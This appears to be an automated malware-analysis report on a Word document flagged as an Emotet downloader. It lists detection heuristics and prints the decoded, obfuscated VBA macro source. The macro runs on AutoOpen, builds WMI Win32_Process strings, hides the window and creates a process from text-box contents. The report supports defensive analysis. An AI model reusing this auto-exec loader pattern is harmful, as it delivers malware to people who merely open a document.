Verdict: MALICIOUS
Risk Score: 250
Heuristics: 8
- ClamAV: Doc.Downloader.Emotet-10001946-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code.
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched line in script: `Set Eojw3iPu = GetObject(Y_HrXP5(Y_HrXP5(nUKNTNHj + "startup")))`
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call. Matched line in script: `Set Eojw3iPu = GetObject(Y_HrXP5(Y_HrXP5(nUKNTNHj + "startup")))`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `autoopen()`
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3185 bytes |

SHA-256: c26416a315d0d1c2f40172a9691eaa75aebd41113326576d4e2f812fd6246f02

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "baO5AQ7"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "zM8ksqra, 0, 0, MSForms, TextBox"
Attribute VB_Control = "b1jOhv, 1, 1, MSForms, TextBox"
Attribute VB_Name = "RH76qr"
Public Sub _
autoopen()
Debug.Print _
"83" + ("319") + ("T6SkzR7" + ("405" + "641") + "hMsJfq" + ("nIEXoz"));
Debug _
.Print "488" _
+ ("788") + ("hPlD3NoI" + ("757" + "842") + "IwZKKI6" + ("i7C2YT"));
Debug.Print "542" + ("648") + _
("ZZoAih" + ("581" + "339") + "T6T8I0Q" + ("hW3ri0U"));
dCMPMju (vGiAi2M)
Debug.Print _
"761" + ("636") + ("s6B11Aw0" + ("570" + "534") + "ULVjzb" + ("qt4kAL4d"));
Debug _
.Print "81" _
+ ("690") + ("rnldjZ" + ("878" + "438") + "P_02NC" + ("zUFUHIBb"));
Debug.Print "818" + ("659") + _
("u4PIMv" + ("593" + "875") + "dHLua5m" + ("sURr9Hjj"));
End Sub
Sub dCMPMju(iNTZLa)
nUKNTNHj = Y_HrXP5(Y_HrXP5("win" + Y_HrXP5(Y_HrXP5("mgmts:w")) + "in32_process"))
Debug.Print _
"224" + ("448") + ("LT192ZKX" + ("821" + "695") + "IL36KH" + ("QFXGi2zw"));
Debug _
.Print "347" _
+ ("984") + ("zhSGOfNw" + ("983" + "1") + "SQwWKj" + ("T9pI7t"));
Debug.Print "413" + ("992") + _
("B16PGn5" + ("774" + "673") + "O4TvUvSF" + ("rkrV04J"));
Set Eojw3iPu = GetObject(Y_HrXP5(Y_HrXP5(nUKNTNHj + "startup")))
Debug.Print _
"758" + ("555") + ("QFwzO7MC" + ("401" + "715") + "IjCwBHcU" + ("GlMatpOO"));
Debug _
.Print "986" _
+ ("52") + ("T0jiCOc" + ("87" + "530") + "Qq_NFfo" + ("wV9Kkw"));
Debug.Print "209" + ("535") + _
("luEhID" + ("273" + "463") + "t6c1L5" + ("XItW8XpC"));
Eojw3iPu _
.ShowWindow = (0 / 1)
Debug.Print _
"148" + ("909") + ("Ii1l6L" + ("895" + "523") + "H5irtaaz" + ("BclwXwk"));
Debug _
.Print "754" _
+ ("703") + ("FjMsnHCL" + ("97" + "596") + "HIZIGTk" + ("D3Rs9BO"));
Debug.Print "144" + ("599") + _
("zzBVW_FT" + ("373" + "607") + "tHcp9ndb" + ("fCs6_q"));
Debug.Print GetObject(Y_HrXP5(nUKNTNHj)).Create(ZcUWWG + Y_HrXP5("p") + baO5AQ7.b1jOhv + baO5AQ7.zM8ksqra + GORzvU9Y, TQjHss5, Eojw3iPu, hc_aNijP);
Debug.Print _
"300" + ("906") + ("cOZwAqo" + ("247" + "690") + "uK4lQvz3" + ("UiijQJM"));
Debug _
.Print "807" _
+ ("895") + ("U8GiEGn" + ("647" + "628") + "zjl1JR" + ("YCk5Iq"));
Debug.Print "863" + ("200") + _
("WbwDOjO" + ("779" + "48") + "JNO6KjC" + ("z7XsDdw"));
End Sub
Function Y_HrXP5(HacLi0X)
Debug.Print _
"994" + ("770") + ("ikqIW9jY" + ("410" + "559") + "o_uUQO" + ("Sc7z76"));
Debug _
.Print "230" _
+ ("132") + ("qYkFsj" + ("353" + "581") + "MfbDo3Y" + ("GzvQTUIp"));
Debug.Print "867" + ("208") + _
("TISuprrR" + ("218" + "967") + "r12B3LEj" + ("GSDIRw"));
Y_HrXP5 = T873WIU + HacLi0X + kirKI6
Debug.Print _
"233" + ("248") + ("FTlE2h" + ("837" + "621") + "PrE4PP" + ("vzIDLOQU"));
Debug _
.Print "137" _
+ ("187") + ("LzT_6W" + ("119" + "276") + "iJHfB_" + ("OR1iVs"));
Debug.Print "120" + ("57") + _
("pjYpVUD" + ("479" + "370") + "tI3czL_7" + ("NiA6_i"));
End Function
Attribute VB_Name = "t2Pudwt"